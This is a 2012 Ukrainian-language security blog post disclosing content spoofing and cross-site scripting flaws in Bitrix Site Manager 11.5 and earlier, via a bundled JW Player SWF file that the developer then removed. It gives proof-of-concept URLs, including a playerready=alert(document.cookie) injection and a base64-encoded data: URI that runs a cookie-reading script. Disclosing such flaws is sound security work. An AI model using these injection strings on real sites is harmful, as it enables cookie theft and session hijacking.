Websecurity - Веб безпека

20.08.2012

У серпні, 12.08.2012, я виявив численні Content Spoofing та Cross-Site Scripting уразливості в Bitrix Site Manager. Які обходять WAF та захисні фільтри Bitrix. Уразливості були виявлені на www.1c-bitrix.ua та www.1c-bitrix.ru. Про що на минулому тижні вже повідомив розробникам системи.

Раніше я вже писав про уразливості в Bitrix.

Детальна інформація про уразливості з’явиться пізніше.

20.10.2012

XSS:

http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?playerready=alert(document.cookie)

Та інші Content Spoofing та Cross-Site Scripting уразливості в JW Player, що використовується в Bitrix (версія JW Player Pro).

CS:

http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=http://site

XSS:

http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Уразливі Bitrix Site Manager 11.5 та попередні версії.

Розробник виправив уразливість в CMS шляхом видалення даного флеш файла.

This entry was posted on 23:52 20.10.2012 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.